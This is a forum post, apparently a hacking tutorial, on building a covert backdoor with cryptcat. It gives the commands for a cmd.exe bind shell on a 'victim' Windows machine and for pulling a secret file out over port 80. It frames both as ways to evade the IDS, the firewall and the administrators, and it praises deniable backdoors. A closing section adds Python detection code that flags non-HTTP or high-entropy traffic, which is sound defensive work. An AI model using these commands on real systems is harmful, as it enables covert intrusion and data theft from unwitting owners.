Staff member
May 15, 2017
A backdoor (from the English "back door", literally a rear entrance) is a defect in an algorithm that its developer deliberately embeds and that allows unauthorized access to data or remote control of the operating system and of the computer as a whole.

The main purpose of a backdoor is covert and fast access to data, in most cases to data that is encrypted and protected. For example, a backdoor can be embedded in an encryption algorithm so that an attacker can later intercept a supposedly secure channel.

The perfect backdoor
  • is impossible to detect;
  • can be used repeatedly;
  • is easy to deny: it looks like a bug, and if it is found the developer can claim the error was accidental and that there was no malicious intent;
  • is exploitable only with knowledge of the secret: only those who know how the backdoor is activated can use it;
  • is protected from compromise by previous uses: even if the backdoor is discovered, it is impossible to establish who exploited it before and what information the attacker obtained;
  • is difficult to reproduce: even if someone finds the backdoor, they will not be able to reuse it in other code or on another device.
Creating a Backdoor with Cryptcat

Cryptcat lets two systems communicate and encrypts the traffic between them with Twofish, one of many strong encryption algorithms.

In this tutorial we introduce netcat's popular cousin, cryptcat (it is actually much nicer and more exotic than plain netcat).

Since Twofish encryption is on par with AES, cryptcat is almost bulletproof: an IDS cannot detect the malicious behaviour even when the traffic runs over ordinary HTTP ports such as 80 and 443.

Step 1: Download Cryptcat

You can download and install cryptcat on a Windows system via this link.

Step 2: Open a listener on a Windows system.

We can open a listener on any system with syntax similar to netcat's. In our case we open the listener on the Windows 7 system on port 6996 and attach a command shell to it.

cryptcat -l -p 6996 -e cmd.exe

-l means "listen"

-p 6996 means "listen on port 6996"

-e cmd.exe means "run a command shell for the incoming connection"

Step 3: Start Snort or another IDS

Now let's run the Snort IDS on another system, the one that will connect to the Windows system, to see whether the encryption can blind the IDS and leave our backdoor invisible to such security devices.



Step 4: Connect to the Windows system with Cryptcat

Cryptcat is installed by default on BackTrack, so we do not need to download and install it. In addition, it is located in the /bin directory, so we can run it from any directory.

Now let's connect from our BackTrack system to cryptcat on the Windows 7 system and see whether we can establish an encrypted backdoor connection that is almost impossible to detect.

cryptcat <windows-ip> 6996


As you can see, we are connected to the Windows 7 system and have a command shell from it! This gives us considerable control over the system, but not total control, because the command shell has limited capabilities.

Step 5: Check the Snort logs and alerts

This type of attack (passing a command shell over the network) is easily detected by Snort or another IDS when the connection is unencrypted. Snort rules will alert the sysadmin that a cmd.exe shell is crossing the network, and they will most likely act to stop you from using it. With the encrypted connection that cryptcat provides, the connection is almost impossible to detect.

Let's go back and check the logs and alerts in Snort. If we succeeded in evading the IDS, we should not see an alert about a command shell crossing the network. We can check our logs by opening /var/snort/alerts and seeing whether our connection to the Windows machine produced any alerts (normally we would expect to find one).

kwrite /var/snort/alerts


As you can see, we succeeded. We were able to connect to the Windows system without attracting the attention of any security system!

Step 6: Send cryptcat through port 80 to avoid the firewall

Although we have successfully created an encrypted backdoor on the victim's system, an attentive security administrator will notice that port 6996 is open. That will most likely prompt some action by the administrator to limit our access. In addition, on systems with a good administrator and a good firewall, this port is likely to be blocked by the firewall.

Almost any network that needs to communicate on the Internet must keep ports 80 and 443 open, and perhaps also 25, 53 and 110. Because normal Internet traffic passes unencrypted through port 80, which is almost always open, a slight increase in traffic there is hardly noticed.

Now that we have used cryptcat successfully, we will send it through port 80 along with the rest of the Internet traffic. Although it is encrypted, it will look like any other binary data on the wire. It will therefore be almost impossible for security devices to detect: they must always allow traffic through port 80, the traffic is encrypted, and the IDS will not be able to "see" its contents.

Here we will move a file called topsecret.txt from the victim's system to our attacking system without any security device identifying it. This time, instead of sending the command shell over the network, we send the file topsecret.txt through our encrypted connection. We do this by typing at the Windows command line:

cryptcat -l -p 80 < topsecret.txt


-l means "listen"

-p 80 means "listen on port 80"

< topsecret.txt means "send this file through the listener"

Step 7: Connect to the listener

Now let's connect to the victim's system and pull the top-secret file. All you need to do is connect to the listener by typing cryptcat, the IP address of the victim system and the listener's port number.

cryptcat <windows-ip> 80


As you can see, the file came through our connection successfully!

Step 8: Check the alert file

Let's check the Snort log files again to confirm that the IDS did not detect the traffic carrying the top-secret file.

kwrite /var/snort/alerts


As you can see, our top-secret file moved through port 80 under the noses of the system administrators, the IDS and the firewall without a trace!

Cryptcat is a great little tool for moving data out of the victim's system through normally open ports without being detected by any security device.
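The claim of steps 5 to 8 is that the IDS sees nothing once the shell and the file transfer are encrypted, because it can no longer match on content. The added example below (written for this edit; it is not code from the post, from cryptcat or from Snort) shows what a defender can still match on: the cleartext cmd.exe banner that a content rule catches in step 5, and, for the encrypted port-80 stream of steps 6 to 8, the fact that the bytes are neither HTTP nor TLS and have cipher-like entropy. All traffic samples are constructed stand-ins: the "encrypted" stream is a seeded PRNG byte string standing in for Twofish output (Twofish itself is not implemented), the TLS sample is only a record header plus opaque bytes, and the alert names are hypothetical.

```python
import math
import random
import re

# --- Constructed sample streams (hand-made stand-ins, not captures from the post's lab) ---

# What a cleartext "-e cmd.exe" session sends first: the cmd.exe banner and a prompt.
CLEARTEXT_SHELL = (
    b"Microsoft Windows [Version 6.1.7601]\r\n"
    b"Copyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n"
    b"\r\nC:\\Users\\victim>"
)

# An ordinary HTTP response, the kind of traffic that legitimately lives on port 80.
HTTP_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 13\r\n\r\n"
    b"<html></html>"
)

# Stand-in for a Twofish-encrypted cryptcat stream. Twofish is not implemented here;
# the output of a sound cipher is indistinguishable from uniform random bytes, so a
# seeded PRNG stream is used as a constructed substitute.
_rng = random.Random(1337)
ENCRYPTED_STANDIN = bytes(_rng.getrandbits(8) for _ in range(1024))

# Stand-in for a TLS record on port 443: handshake content type 0x16, version 3.x,
# a length field, then opaque bytes. Constructed, not a real ClientHello.
TLS_STANDIN = b"\x16\x03\x01\x02\x00" + bytes(_rng.getrandbits(8) for _ in range(512))

_HTTP_REQUEST = re.compile(
    rb"^(?:GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH|CONNECT|TRACE) \S+ HTTP/1\.[01]\r\n"
)
_HTTP_RESPONSE = re.compile(rb"^HTTP/1\.[01] \d{3} ")
# A Windows prompt such as "C:\Users\victim>" at the start of a line.
_CMD_PROMPT = re.compile(rb"(?:^|\r\n)[A-Za-z]:\\[^\r\n]{0,200}>")


def shannon_entropy(data):
    """Bits per byte: text sits around 4 to 5, encrypted or compressed data near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_like_http(payload):
    """True if the stream opens with an HTTP/1.x request line or status line."""
    return bool(_HTTP_REQUEST.match(payload) or _HTTP_RESPONSE.match(payload))


def looks_like_tls(payload):
    """True if the stream opens with a TLS record header (type 0x14-0x17, major version 3)."""
    return len(payload) >= 3 and 0x14 <= payload[0] <= 0x17 and payload[1] == 0x03


def classify(service_port, payload):
    """Return the (hypothetical) alert names raised for one direction of a TCP stream.

    service_port is the port the listener was opened on (6996 in step 2, 80 in step 6).
    """
    alerts = []
    # Content signature: this is what fires on the unencrypted shell in step 5.
    if b"Microsoft Windows [Version" in payload or _CMD_PROMPT.search(payload):
        alerts.append("cleartext-cmd-shell")
    # Protocol conformance: port 80 must carry HTTP, port 443 must carry TLS records.
    if service_port == 80 and not looks_like_http(payload):
        alerts.append("non-http-on-port-80")
    if service_port == 443 and not looks_like_tls(payload):
        alerts.append("non-tls-on-port-443")
    # Cipher-like bytes outside a TLS session are worth a look on any port.
    if shannon_entropy(payload) > 7.0 and not looks_like_tls(payload):
        alerts.append("high-entropy-payload")
    return alerts


if __name__ == "__main__":
    for label, port, stream in [
        ("step 2 shell, cleartext", 6996, CLEARTEXT_SHELL),
        ("step 4 shell, encrypted", 6996, ENCRYPTED_STANDIN),
        ("step 6 file, encrypted on 80", 80, ENCRYPTED_STANDIN),
        ("normal web response", 80, HTTP_RESPONSE),
        ("normal TLS on 443", 443, TLS_STANDIN),
    ]:
        print(f"{label:32s} -> {classify(port, stream)}")
```

The content signature is the only one of the three checks that encryption defeats. The other two do not need to read the payload at all: a stream on port 80 whose first bytes are not an HTTP request or status line, or bytes on any port that look like cipher output without a TLS record header in front of them, are exactly what the encrypted cryptcat sessions in steps 4 and 7 produce, so a protocol-conformance check on the well-known ports is the detection that survives this technique.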